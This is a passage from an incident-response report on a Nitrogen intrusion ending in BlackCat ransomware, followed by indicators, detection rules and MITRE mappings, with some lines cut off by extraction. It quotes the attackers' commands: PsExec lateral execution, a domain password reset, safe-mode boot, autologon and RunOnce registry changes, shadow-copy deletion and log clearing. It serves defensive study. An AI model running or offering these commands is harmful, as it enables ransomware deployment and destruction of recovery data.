In this case, the Threat Actor used a REST server.\r\n“–password-file”: This option grabs the backup password from a file, in this case ppp.txt\r\n“–use-fs-snapshot”: This option will use the Windows’ Volume Shadow Copy Service (VSS) for creating backups.\r\nRestic, according the the documentation, will transparently create a VSS snapshot for each volume that contains files\r\nto backup. Files are read from the VSS snapshot instead of the regular filesystem. This allows to backup files that are\r\nexclusively locked by another process during the backup.\r\n“–verbose”: This option is used to print a live status of the backup or the processed files.\r\nThe traffic related to this activity triggered the following Suricata alert: ET USER_AGENTS Go HTTP Client User-Agent .\r\nInvestigating the Suricata EVE flow logs would reveal the usage of Restic thanks to the Content-Type HTTP header:\r\nhttp: {\r\nprotocol: \"HTTP/1.1\",\r\nhttp_content_type: \"application/vnd.x.restic.rest.v2\"\r\n}\r\nImpact\r\nThe threat actor dropped and executed two batch scripts, up.bat and 1.bat, remotely using PsExec on targeted servers to\r\nperform various operations.\r\nThe up.bat script was executed remotely on a domain controller using the following command:\r\ncmd.exe /C PsExec64.exe -accepteula \\\\\u003cDOMAIN-CONTROLLER-IP\u003e -c -f -d -s up.bat\r\nThe script contained a one liner to reset the password to a privileged service account:\r\nnet user REDACTED JapanNight!128 /domain\r\nThe threat actor executed the following command to remotely copy the ransomware binary to the target machines before\r\nrunning the second batch script:\r\ncmd.exe /C for /f %a in (pc.txt) do copy /y \\\\\u003cREDACTED\u003e\\c$\\\u003cREDACTED\u003e.exe \\\\%a\\c$\\\u003cREDACTED\u003e.exe\r\nThe second script, 1.bat, was then executed on multiple hosts using the following command:\r\ncmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat\r\nThe script contained the following commands:\r\nbcdedit /set {default} safeboot network\r\nfindstr /C:\"The operation completed successfully.\"\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce /v *a /t REG_SZ /d \"cmd.exe /c C:\\\u003cREDACTED-CO\r\nfindstr /C:\"The operation completed successfully.\"\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName /t REG_SZ /d \u003cREDACTE\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultPassword /t REG_SZ /d JapanNig\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f\r\ntimeout /T 10\r\nshutdown -r -t 0\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 28 of 37\n\nThe above commands were meant to preform the following operations:\r\nThe first command uses bcdedit utility to modify and set the default boot configuration of the system to the “safe\r\nmode with networking”.\r\nThe second command is using findstr to check if the previous command executed successfully.\r\nThe following reg commands are used to modify the registry and enable automatic logon using the service account,\r\nand add the ransomware binary \u003cREDACTED-COMPANY-NAME\u003e.exe to\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce to be executed on system’s start up.\r\nThe last commands are used to initiate an immediate system restart after a 10 second delay.\r\nThe ransomware binary \u003cREDACTED-COMPANY-NAME\u003e.exe executed multiple files and utilities, below are the child\r\nand grand child processes showing the behavior of this ransomware binary:\r\nC:\\\u003cREDACTED-COMPANY-NAME\u003e.exe\r\n----\u003e C:\\example.exe C:\\example.exe --access-token REDACTED --safeboot-network\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Sa\r\n--------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"bcdedit /set {current} safeboot network\"\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\example.exe --safeboot-instance --access-token REDACTED --p\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\Windows\\TEMP\\2-REDACTED-51.exe --safeboot-instance --access\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\example.exe --safeboot-instance --access-token REDACTED --p\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\Windows\\TEMP\\2-REDACTED-51.exe --safeboot-instance --access\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\example.exe --safeboot-instance --access-token REDACTED --p\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\Windows\\TEMP\\2-REDACTED-51.exe --safeboot-instance --access\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Sa\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"sc delete 15991160457623399845550968347370640942\"\r\n--------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"bcdedit /deletevalue {current} safeboot\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"wmic csproduct get UUID\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"iisreset.exe /stop\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Servic\r\n------------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"vssadmin.exe Delete Shadows /all /quiet\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"arp -a\"\r\n------------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"wmic.exe Shadowcopy Delete\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"wevtutil.exe el\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"wevtutil.exe cl \u003cMULTIPLE EVENT LOGS\u003e (Executed hundreds o\r\nThe threat actor executed the binary example.exe which configured the ransomware, cleared logs and deleted volume\r\nshadow copies.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 29 of 37\n\nThe ransomware options were dissected in Netscope’s BlackCat Ransomware: Tactics and Techniques From a Targeted\r\nAttack blog post.\r\nUpon the execution of these utilities, the binary started encrypting files and dropping the ransom note:\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 30 of 37\n\nTimeline\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 31 of 37\n\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 32 of 37\n\nDiamond Model\r\nIndicators\r\nAtomic\r\nSliver\r\n194.49.94[.]18:8443\r\n194.169.175[.]134:8443\r\nCobalt Strike\r\n91.92.250[.]60:443\r\n91.92.250[.]65:443\r\nStaging Tool Server\r\n91.92.245[.]26:443\r\nExfiltration Server\r\n195.123.226[.]84:8000\r\nComputed\r\nVersion.zip\r\nDBF5F56998705C37076B6CAE5D0BFB4D\r\nE6AB3C595AC703AFD94618D1CA1B8EBCE623B21F\r\n5DC8B08C7E1B11ABF2B6B311CD7E411DB16A7C3827879C6F93BD0DAC7A71D321\r\nwo14.py\r\nEB64862F1C8464CA3D03CF0A4AC608F4\r\n6F43E6388B64998B7AA7411104B955A8949C4C63\r\n726F038C13E4C90976811B462E6D21E10E05F7C11E35331D314C546D91FA6D21\r\nworksliv.py\r\n3A4FDBC642A24A240692F9CA70757E9F\r\n794203A4E18F904F0D244C7B3C2F5126B58F6A21\r\n5F7D438945306BF8A7F35CAB0E2ACC80CDC9295A57798D8165EF6D8B86FBB38D\r\nslv.py\r\n7A4CB8261036F35FD273DA420BF0FD5E\r\n9648559769179677C5B58D5619CA8872F5086312\r\n4EF1009923FC12C2A3127C929E0AA4515C9F4D068737389AFB3464C28CCF5925\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 33 of 37\n\nwork.aes\r\n1BE7FE8E20F8E9FDC6FD6100DCAD38F3\r\nC4CDE794CF4A68D63617458A60BC8B90D99823CA\r\n4EE4E1E2CEDF59A802C01FAE9CCFCFDE3E84764C72E7D95B97992ADDD6EDF527\r\ndata.aes\r\n4232C065029EB52D1B4596A08568E800\r\n79818110ABD52BA14800CDFF39ECA3252412B232\r\n3298629DE0489C12E451152E787D294753515855DBF1CE80BFCDED584A84AC62\r\nservice_probes\r\n637FB65A1755C4B6DC1E0428E69B634E\r\nFBA4652B6DBE0948D4DADCEBF51737A738CA9E67\r\nB3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6\r\nUpdateEG.bat\r\n0B1882F719504799B3211BF73DFDC253\r\n448892D5607124FDD520F62FF0BC972DF801C046\r\n39EC2834494F384028AD17296F70ED6608808084EF403714CFBC1BFBBED263D4\r\npython311.dll\r\nE20FC97E364E859A2FB58D66BC2A1D05\r\nF5F56413F81E8F4A941F53E42A90BA1720823F15\r\n9514035FEA8000A664799E369AE6D3AF6ABFE8E5CDA23CDAFBEDE83051692E63\r\nexample.exe\r\nC737A137B66138371133404C38716741\r\nA3E4FB487400D99E3A9F3523AEAA9AF5CF6E128B\r\n25172A046821BD04E74C15DC180572288C67FDFF474BDB5EB11B76DCE1B3DAD3\r\n2-REDACTED-51.exe\r\n7A1E7F652055C812644AD240C41D904A\r\nB39C244C3117F516CE5844B2A843EFF1E839207C\r\n5FAC60F1E97B6EAAE18EBD8B49B912C86233CF77637590F36AA319651582D3C4\r\ndomain_name.exe\r\nE0D1CF0ABD09D7632F79A8259283288D\r\n3A78CE27A7AA16A8230668C644C7DF308DE6CF33\r\nD15CAB3901E9A10AF772A0A1BDBF35B357EE121413D4CF542D96819DC4471158\r\nDetections\r\nNetwork\r\nETPRO JA3 Hash - Possible Ligolo Server/Golang Binary Response\r\nET USER_AGENTS Go HTTP Client User-Agent\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET POLICY PsExec service created\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY Command Shell Activity Over SMB - Possible Lateral Movement\r\nET POLICY Powershell Activity Over SMB - Likely Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For a .bat File\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET INFO Suspected Impacket WMIExec Activity\r\nET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)\r\nET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection\r\nET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check\r\nETPRO USER_AGENTS Observed Suspicious UA (Mozilla/5.0)\r\nSigma\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 34 of 37\n\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\nDFIR Private Rules:\r\n934fa692-f2fa-4465-8bb3-ee1d4c0718cc : Enabling Safeboot with BCDEDIT\r\n181f510b-0b3c-4e05-939c-7623a4a9c82c : Execution of Python Scripts in AppData Directory\r\n6f77de5c-27af-435b-b530-e2d07b77a980 : Impacket Tool Execution\r\nd2722770-3295-478e-bd58-c3c18baaa821 : Modification of UserInit Registry Value\r\n3f684d2e-4760-4db9-a578-3698e21a01d5 : Modification of UserInit Registry Value\r\n2249fc47-1825-4137-b9ce-aa65749bb68c : Restic Backup Tool Misuse\r\nSigma Repo:\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity\r\n8d5aca11-22b3-4f22-b7ba-90e60533e1fb : Wmiexec Default Output File\r\n526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE\r\n7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools\r\n42c575ea-e41e-41f1-b248-8093c3e82a28 : PsExec Service Installation\r\n8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2\r\n192a0330-c20b-4356-90b6-7b7049ae0b8 : Successful Overpass the Hash Attempt\r\nd7662ff6-9e97-4596-a61d-9839e32dee8d : Add SafeBoot Keys Via Reg Utility\r\ncc36992a-4671-4f21-a91d-6c2b72a2edf5 : Suspicious Eventlog Clearing or Configuration Change Activity\r\nc947b146-0abc-4c87-9c64-b17e9d7274a2 : Shadow Copies Deletion Using Operating Systems Utilities\r\ndcd74b95-3f36-4ed9-9598-0490951643aa : PowerView PowerShell Cmdlets - ScriptBlock\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/25590/25590.yar\r\nExternal Rules:\r\nMITRE ATT\u0026CK\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 35 of 37\n\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 36 of 37\n\nAccount Manipulation - T1098\r\nClear Windows Event Logs - T1070.001\r\nData Encrypted for Impact - T1486\r\nData from Network Shared Drive - T1039\r\nDLL Side-Loading - T1574.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nDrive-by Compromise - T1189\r\nDynamic-link Library Injection - T1055.001\r\nEncrypted/Encoded File - T1027.013\r\nExfiltration Over Alternative Protocol - T1048\r\nIngress Tool Transfer - T1105\r\nInhibit System Recovery - T1490\r\nLateral Tool Transfer - T1570\r\nLocal Account - T1087.001\r\nLocal Groups - T1069.001\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nMasquerading - T1036\r\nMatch Legitimate Name or Location - T1036.005\r\nNetwork Share Discovery - T1135\r\nPowerShell - T1059.001\r\nProcess Injection - T1055\r\nPython - T1059.006\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nSafe Mode Boot - T1562.009\r\nScheduled Task - T1053.005\r\nService Execution - T1569.002\r\nSMB/Windows Admin Shares - T1021.002\r\nWeb Protocols - T1071.001\r\nWindows Command Shell - T1059.003\r\nWindows Management Instrumentation - T1047\r\nWinlogon Helper DLL - T1547.004\r\nInternal case #TB25590 #PR32467\r\nSource: https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 37 of 37\n\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/    \nSubsequently, the Sliver DLL is injected in memory and the DLL entrypoint is called.\n  Page 6 of 37",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/"
	],
	"report_names": [
		"nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434077,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2d2b97a37fe5e90dcb511358ef5c177899f5f5f1.pdf",
		"text": "https://archive.orkl.eu/2d2b97a37fe5e90dcb511358ef5c177899f5f5f1.txt",
		"img": "https://archive.orkl.eu/2d2b97a37fe5e90dcb511358ef5c177899f5f5f1.jpg"
	}
}